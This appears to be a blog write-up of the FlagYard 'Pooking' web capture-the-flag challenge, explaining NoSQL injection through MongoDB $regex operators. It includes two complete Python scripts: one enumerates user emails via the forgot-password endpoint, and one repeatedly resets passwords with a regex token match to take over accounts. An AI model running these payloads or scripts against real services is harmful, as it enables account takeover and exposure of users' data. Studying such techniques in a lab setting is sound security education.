m7eesn blog

Pooking [WEB] (Medium) - FlagYard

1. Challenge Overview

Challenge Description

Explore the cars world with Pooking.com

Pooking is a web challenge from flagYard, it’s about car rental portal The front page is harmless, but the API that powers it exposes several JSON endpoints:

The challenge is to obtain customer accounts (and ultimately the flag) without knowing any credentials up front. During recon we noticed that every request body we send is forwarded directly into MongoDB. That gives us the classic NoSQL-injection playground: if we embed operators such as $regex, the server evaluates them instead of treating them as plain strings.


2. Reconnaissance Notes

  1. Forgot Password accepts regex.
    Sending {"email":{"$regex":"^a"}} returns HTTP 200 whenever a stored email starts with “a”. The server clearly runs db.users.findOne(req.body.email) without sanitizing the payload.

  2. Reset Password validates tokens with user input.
    We tested {"token":{"$regex":"^.*"},"newPassword":"password"} and the backend happily accepted it, proving it evaluates the regex operator and therefore matches any token document.

  3. Book-Car is a dead end for leakage.
    We tried replacing strings with $regex there as well. The API simply echoed our JSON in the response, which told us it was performing an insert rather than a read. No data exfiltration through that route.

With those observations we had a route to victory: enumerate every email via forgot-password, then brute-force the reset endpoint until each account’s password was replaced with a value we control.


3. Building the Email Enumerator (mail_extractor.py)

Manual probing with curl is miserable, so we wrote an automated harvester.

Key ideas inside mail_extractor.py:

Result: We harvested 34 valid emails.

#!/usr/bin/env python3
import os
import re
import string
import sys
from typing import Iterable

import requests

URL = "http://your_url.playat.flagyard.com/api/forgot-password"
HEADERS: dict[str, str] = {
    "Content-Type": "application/json",
    "Origin": "http://your_url.playat.flagyard.com",
    "User-Agent": "Mozilla/5.0",
}
REGEX_OPTIONS = "i" # case-insensitive matching

CHARSET: list[str] = list(string.ascii_lowercase +  string.digits + "@_-.")

MAX_LEN = 80
SAVE_FILE = "emails_found.txt"
if not os.path.exists(SAVE_FILE):
    with open(SAVE_FILE, "w") as f:
        pass
    
EXTRA_EMAILS_FILE = "emails.txt"

DEFAULT_DOMAINS: set[str] = {
    "gmail.com",
    "outlook.com",
    "hotmail.com",
    "live.com",
    "yahoo.com",
    "icloud.com",
}

def probe_regex(regex):
    try:
        payload = {"email": {"$regex": regex}}
        if REGEX_OPTIONS:
            payload["email"]["$options"] = REGEX_OPTIONS

        r = requests.post(URL, json=payload, headers=HEADERS, timeout=10, allow_redirects=False )
        if r.status_code == 200:
            return True, r
        return False, r
    except Exception as e:
        print("request error:", e)
        return False, None


def build_known_paths(emails: set[str]) -> dict[str, set[str]]:
    """Map each prefix (lowercased) to the next character(s) observed in known emails."""
    mapping: dict[str, set[str]] = {}
    for email in emails:
        lowered: str = email.lower()
        for i in range(len(lowered)):
            prefix: str = lowered[:i]
            next_char: str = lowered[i]
            mapping.setdefault(prefix, set()).add(next_char)
    return mapping


def extract_domains(emails: Iterable[str]) -> set[str]:
    domains: set[str] = set()
    for email in emails:
        if "@" in email:
            domains.add(email.split("@", 1)[1].lower())
    return domains


def load_domain_candidates(found_emails: set[str], extra_paths: list[str] | None = None ) -> set[str]:
    domains = set(DEFAULT_DOMAINS)
    domains.update(extract_domains(found_emails))

    for path in extra_paths or []:
        if not path or not os.path.exists(path):
            continue
        try:
            with open(path, "r") as f:
                for line in f:
                    line = line.strip()
                    if "@" in line:
                        domains.add(line.split("@", 1)[1].lower())
        except OSError as e:
            print(f"warning: unable to read {path}: {e}")
    return domains


def try_domain_guesses(
    local_part: str,
    domain_prefix: str,
    known_domains: set[str],
    found: set[str],
    found_lower: set[str],
    tested_exact: set[str],
    domain_guess_attempted: set[str],
    known_paths: dict[str, set[str]],
    prune_prefixes: set[str],
    verified_domains_by_local: dict[str, set[str]],
):
    """Attempt full domain combinations based on known domains."""
    domain_prefix_lower = domain_prefix.lower()
    for domain in sorted(known_domains):
        if not domain.startswith(domain_prefix_lower):
            continue
        guess = f"{local_part}@{domain}"
        guess_lower = guess.lower()
        if guess_lower in found_lower or guess_lower in domain_guess_attempted:
            continue
        domain_guess_attempted.add(guess_lower)
        if verify_exact(guess):
            print(f" VERIFIED (domain guess): {guess}")
            found.add(guess)
            found_lower.add(guess_lower)
            known_domains.add(domain)
            prune_prefixes.add(guess_lower)
            verified_domains_by_local.setdefault(local_part.lower(), set()).add(domain)
            persist_found(sorted(found, key=str.lower), SAVE_FILE)
            known_paths.clear()
            known_paths.update(build_known_paths(found))
        else:
            tested_exact.add(guess_lower)


def build_char_order(prefix: str, known_paths: dict[str, set[str]]) -> list[str]:
    """Order characters so known-path continuations are attempted last."""
    preferred = known_paths.get(prefix.lower(), set())
    primary: list[str] = []
    postponed: list[str] = []
    for ch in CHARSET:
        (postponed if ch.lower() in preferred else primary).append(ch)
    return primary + postponed


def enumerate_prefixes(
    start_prefix: str = "",
    known_paths: dict[str, set[str]] | None = None,
    prune_prefixes: set[str] | None = None,
    verified_domains_by_local: dict[str, set[str]] | None = None,
):
    """Depth-first enumerate all prefixes that produce regex hits."""
    if known_paths is None:
        known_paths = {}
    if prune_prefixes is None:
        prune_prefixes = set()
    if verified_domains_by_local is None:
        verified_domains_by_local = {}
    attempt_counter = 0
    # stack entries: (prefix, next_index, tried_normalized_chars, char_order)
    stack: list[tuple[str, int, set[str], list[str]]] = [
        (start_prefix, 0, set(), build_char_order(start_prefix, known_paths))
    ]
    while stack:
        prefix, idx, tried_norm, char_order = stack[-1]
        prefix_lower = prefix.lower()

        # If this prefix or any of its extensions are already fully resolved, skip.
        if any(prefix_lower.startswith(p) for p in prune_prefixes):
            stack.pop()
            continue

        if "@" in prefix:
            local_part, domain_part = prefix_lower.split("@", 1)
            domains = verified_domains_by_local.get(local_part)
            if domains:
                should_pop = False
                for domain in domains:
                    if domain.startswith(domain_part):
                        should_pop = True
                        break
                if should_pop:
                    stack.pop()
                    continue

        # advance idx until we find a character whose normalized form we have not tried yet
        while idx < len(char_order) and char_order[idx].lower() in tried_norm:
            idx += 1

        if idx >= len(char_order) or len(prefix) >= MAX_LEN:
            stack.pop()
            continue

        ch = char_order[idx]
        tried_norm.add(ch.lower())
        stack[-1] = (prefix, idx + 1, tried_norm, char_order)

        candidate = prefix + ch
        regex: str = "^" + re.escape(candidate) + ".*"
        attempt_counter += 1
        sys.stdout.write(f"\rAttempt {attempt_counter:>6}: trying '{candidate}'")
        sys.stdout.flush()
        hit, _ = probe_regex(regex)
        if not hit:
            continue

        sys.stdout.write(f"\rAttempt {attempt_counter:>6}: ✓ '{candidate}'\n")
        sys.stdout.flush()

        candidate_lower = candidate.lower()

        if len(candidate) < MAX_LEN and candidate_lower not in prune_prefixes:
            stack.append(
                (candidate, 0, set(), build_char_order(candidate, known_paths))
            )

        yield candidate, attempt_counter


def plausible_email(s):
    if "@" in s and "." in s.split("@")[-1]:
        return True
    return False


def verify_exact(email) -> bool:
    regex = "^" + re.escape(email) + "$"
    hit, _ = probe_regex(regex)
    return hit


def load_existing_found(path: str) -> set[str]:
    if not os.path.exists(path):
        return set()
    with open(path, "r") as f:
        return {line.strip() for line in f if line.strip()}


def persist_found(sorted_emails: list[str], path: str) -> None:
    with open(path, "w") as f:
        for email in sorted_emails:
            f.write(email + "\n")


if __name__ == "__main__":
    found = load_existing_found(SAVE_FILE)
    found_lower = {email.lower() for email in found}
    tested_exact: set[str] = set()
    known_paths = build_known_paths(found)
    known_domains = load_domain_candidates(found, extra_paths=[EXTRA_EMAILS_FILE])
    domain_guess_attempted: set[str] = set()
    prune_prefixes: set[str] = set(found_lower)
    verified_domains_by_local: dict[str, set[str]] = {}
    for email in found_lower:
        if "@" in email:
            local, domain = email.split("@", 1)
            verified_domains_by_local.setdefault(local, set()).add(domain)

    if found:
        print(f"Loaded {len(found)} known email(s) from {SAVE_FILE}.")

    try:
        for candidate, attempt_no in enumerate_prefixes("", known_paths, prune_prefixes, verified_domains_by_local):
            candidate_lower = candidate.lower()
            if candidate_lower in found_lower:
                continue

            if candidate_lower in tested_exact:
                continue

            if "@" in candidate:
                local_part, domain_prefix = candidate.split("@", 1)
                if local_part:
                    try_domain_guesses(
                        local_part,
                        domain_prefix,
                        known_domains,
                        found,
                        found_lower,
                        tested_exact,
                        domain_guess_attempted,
                        known_paths,
                        prune_prefixes,
                        verified_domains_by_local,
                    )

            if plausible_email(candidate):
                tested_exact.add(candidate_lower)
                if verify_exact(candidate):
                    print(f" VERIFIED: {candidate}")
                    found.add(candidate)
                    found_lower.add(candidate_lower)
                    prune_prefixes.add(candidate_lower)
                    persist_found(sorted(found, key=str.lower), SAVE_FILE)
                    known_paths.clear()
                    known_paths.update(build_known_paths(found))
                    if "@" in candidate:
                        domain = candidate.split("@", 1)[1].lower()
                        known_domains.add(domain)
                        verified_domains_by_local.setdefault(
                            candidate.split("@", 1)[0].lower(), set()
                        ).add(domain)
                else:
                    print(f" plausible but not exact yet: {candidate}")
    except KeyboardInterrupt:
        print("\nInterrupted by user.")

    if found:
        print(f"\nCurrent collected emails ({len(found)} total):")
        for e in sorted(found, key=str.lower):
            print("-", e)
    else:
        print("No verified emails collected yet.")

4. Weaponizing the Reset Endpoint (execute_requests.py)

Resetting passwords one-by-one with curl is error-prone, especially because the $regex token bypass occasionally resets the wrong user (whichever Mongo returns first). The helper script automates the entire workflow safely:

  1. Preflight login.
    For each email in emails_found.txt, the script first tries to log in with our chosen password. If that already works we skip the reset loop entirely.

  2. Trigger token generation.
    We still call /api/forgot-password to ensure the backend creates or refreshes a reset token.

  3. Reset & login loop (up to XXX attempts).

    • POST {"token":{"$regex":"^.*"},"newPassword":"password"} to /api/reset-password.
    • Immediately attempt login.
    • Record both responses for later analysis.
    • Break early if the login succeeds.
  4. Logging.
    Each result is saved to login_results.json with status codes and response snippets so we can prove which accounts were taken over.

By iterating this loop we eventually hit the correct token document for each target user. Once their password was set, the plain login endpoint granted us full access. We had a if statement to check to see if the response contained the flag format, and sure enough one of the accounts held the prize.

The power of hand sight, if we inverted the order of digits vs letters in the charset we could have shaved off hours of enumeration time. Still, the scripts worked reliably and managed to get us the flag eventually.

#!/usr/bin/env python3
import json
import sys
from pathlib import Path
from typing import Any, Dict, Optional

import requests

BASE_URL = "http://your_url.playat.flagyard.com"
PASSWORD = "password"
MAX_RESET_ATTEMPTS = 100

BASE_HEADERS = {
    "Content-Type": "application/json",
    "Accept": "*/*",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
}

RESET_PAYLOAD = {"token": {"$regex": "^.*"}, "newPassword": PASSWORD}


def request_login(email: str, password: str) -> requests.Response:
    return requests.post(f"{BASE_URL}/api/login", json={"email": email, "password": password}, headers=BASE_HEADERS)

def request_forgot(email: str) -> requests.Response:
    return requests.post(f"{BASE_URL}/api/forgot-password", json={"email": email}, headers=BASE_HEADERS)

def request_reset(payload: Optional[Dict[str, Any]] = None) -> requests.Response:
    body = payload or RESET_PAYLOAD
    return requests.post(f"{BASE_URL}/api/reset-password", json=body, headers=BASE_HEADERS)


emails_file = Path("emails_found.txt")
if not emails_file.exists():
    print(f"Emails file '{emails_file}' not found. Please run mail_extractor.py first.")
    sys.exit(1)

emails: list[str] = [
    line.strip() for line in emails_file.read_text().splitlines() if line.strip()
]

# Store login results
login_results = []

# Process each email
for email in emails:
    print(f"\n{'=' * 60}")
    print(f"Processing email: {email}")
    print("=" * 60)

    result: Dict[str, Any] = {"email": email, "attempts": []}

    try:
        # Step 0: preflight login check
        print(f"\n[0/3] Checking existing login for {email}...")
        preflight_login = request_login(email, PASSWORD)
        print(f"Response Status: {preflight_login.status_code}")
        print(f"Response: {preflight_login.text[:200]}")
        result["preflight_status"] = preflight_login.status_code

        if preflight_login.status_code == 200:
            print("Login already successful; skipping reset workflow.")
            try:
                if "flag" in preflight_login.text.lower():
                    print("Flag detected in reset response!")
                    print(f"Response: {preflight_login.text}")
                    sys.exit(0)
                result["response"] = preflight_login.json()
            except Exception:
                result["response"] = {
                    "raw": preflight_login.text,
                    "status_code": preflight_login.status_code,
                }
            result["status_code"] = preflight_login.status_code
            result["skipped_reset"] = True
            login_results.append(result)
            continue

        # Step 1: Request password reset token generation
        print(f"\n[1/3] Requesting password reset for {email}...")
        forgot_response = request_forgot(email)
        print(f"Response Status: {forgot_response.status_code}")
        print(f"Response: {forgot_response.text[:200]}")
        result["forgot_status"] = forgot_response.status_code
        result["forgot_response_snippet"] = forgot_response.text[:200]

        final_login_status: Optional[int] = None
        final_login_json: Optional[Dict[str, Any]] = None

        # Steps 2 & 3: Attempt reset + login cycles
        for attempt in range(1, MAX_RESET_ATTEMPTS + 1):
            print(
                f"\n[2/3] Resetting password (attempt {attempt}/{MAX_RESET_ATTEMPTS})..."
            )
            reset_response = request_reset()
            print(f"Response Status: {reset_response.status_code}")
            reset_text = reset_response.text[:200]
            print(f"Response: {reset_text}")

            if "flag" in reset_response.text.lower():
                print("Flag detected in reset response!")
                print(f"Response: {reset_response.text}")
                sys.exit(0)

            print("\n[3/3] Attempting login with email and password...")
            login_response = request_login(email, PASSWORD)
            print(f"Response Status: {login_response.status_code}")
            print(f"Response: {login_response.text[:200]}")

            try:
                login_json = login_response.json()
            except Exception:
                login_json = {
                    "raw": login_response.text[:200],
                    "status_code": login_response.status_code,
                }

            result["attempts"].append(
                {
                    "attempt": attempt,
                    "reset_status": reset_response.status_code,
                    "reset_response_snippet": reset_text,
                    "login_status": login_response.status_code,
                    "login_response": login_json,
                }
            )

            if login_response.status_code == 200:
                final_login_status = login_response.status_code
                final_login_json = login_json
                print("Login succeeded after reset.")
                break

        if final_login_status is None:
            # Capture last login response even if failure
            final_login_status = (
                result["attempts"][-1]["login_status"] if result["attempts"] else None
            )
            final_login_json = (
                result["attempts"][-1]["login_response"] if result["attempts"] else None
            )

        result["status_code"] = final_login_status
        result["response"] = final_login_json

    except Exception as e:
        print(f"Error processing {email}: {e}")
        result["error"] = str(e)

    login_results.append(result)

json_text = json.dumps(login_results, indent=2)
print(f"\n\n{'=' * 60}")
print("FINAL LOGIN RESULTS (JSON):")
print("=" * 60)
print(json_text)
Path("login_results.json").write_text(json_text)

5. Conclusion

The challenge demonstrated classic NoSQL injection techniques, leveraging regex operators to enumerate user emails and reset passwords. While the exploitation process was straightforward, it required careful automation to handle the brute-force nature of the reset token guessing. The provided scripts effectively automated the enumeration and exploitation steps, ultimately leading to the successful retrieval of the flag.

I personally did not enjoy the challenge due to the extensive brute forcing and waiting times involved, which detracted from the overall experience. However, it served as a practical exercise in bling-NoSQL injection techniques and automation strategies.

PS: There might be different way to solve the challenge, this the only way i found that produced results.